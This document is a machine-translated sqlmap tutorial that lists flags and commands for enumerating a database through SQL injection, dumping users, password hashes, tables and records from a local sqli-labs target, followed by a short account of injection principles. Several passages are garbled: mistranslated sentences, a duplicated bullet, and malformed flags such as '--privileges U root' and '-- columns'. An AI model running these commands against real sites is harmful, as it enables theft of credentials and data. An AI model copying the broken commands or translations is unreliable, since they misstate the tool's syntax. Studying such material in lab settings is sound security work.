A, sqlmap retrieve DBMS information
-
Back-end database to obtain information banner
参数 --banner或者-b
-
Get the current database name
参数 --current-db
-
Get names
参数 --hostname
-
Detecting whether the current user is the database administrator
参数 --is-dba
-
Sqlmap will first list users, and then lists the user's password Hash values.
参数 --passwords
-
All users get DBMS
参数 --users
-
sqlmap enumeration of rights DBMS
参数:--privileges
-
Use this feature when the current user has permission to read the database management system contains user information in the system tables of the database management system include the user's privileges. The user can determine which user is the administrator privileges.
-
To enumerate only specific users permission to use the parameter "-U" specify the user, can be "CU" to represent the current user.
python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --privileges U root
-
Two, sqlmap enumeration information
-
Database name list
参数 --dbs
-
List the name of the database table
参数: --tables -D 数据库名字 指定具体数据库 python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -D security --tables
-
sqlmap enumerated data table column
参数 -- columns -T 表名字 指定具体表 python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -T users --columns
-
sqlmap enumerated data value
参数 --dump python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -T users --columns --dump
-
sqlmap enumeration schema information
This option is available to the user list mode database management systems. Mode list contains all databases, tables, columns, triggers, and their respective types . Likewise, the parameter ** - exclude-sysdbs ** exclude system database.
参数 --schema
-
-exclude-sysdbs exclusion database system
Three, sqlmap retrieve data table quantities
-
If you want to know the number of entries in the table, you can use this parameter
参数 --count python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --count -D security
-
qlmap access to data information
参数 --start --stop --start 1 --stop 3 返回当前数据库表的前三条记录 python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --count -D security --tables --start 1 --stop 3 --dump
-
sqlmap Set Access to information
参数 --where python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --count -D security -T users --where='id>2' --dump
Four, sqlmap brute force data
-
Brute table
参数 --common-tables python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --common-tables 有些情况下用--tables不能列出数据库中表名来比如: 1.版本小于5.0的MySQL没有information_schema表 2.数据库用户权限过低无法读取表名
Five, sqlmap retrieve all the information
-
Return all information retrieval
参数 -a 或者--all python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -a
Six, SQL injection principle
6.1 Introduction to SQL Injection
SQL injection refers to the web application does not judge the legitimacy of user input data, passing the rear end of the front attacker controllable parameters and parameters into a database query, the attacker can construct different SQL statements to implement any of the database operating
Produce 6.2 SQL injection vulnerabilities need to meet two conditions
- User-controllable parameters
- Into database query parameters, the parameters passed to the SQL statement stitching, and into the database query
6.3 SQL injection hazard
- Database disclosure of sensitive information
- Page has been tampered with
- The database is malicious
- Server is remote control
6.4 SQL injection classification
-
The injection position can be SQL data type injection into two types: numeric and string
字符串注入 数字注入
-
The injection position can be SQL data type injection into two types: numeric and string
字符串注入 数字注入
Reason 6.5 SQL injection
- No strict separation of data and code
- Parameter data submitted by the user without making adequate checks and filters are brought into a SQL command, SQL commands change the original 'semantics', executed by the database and successfully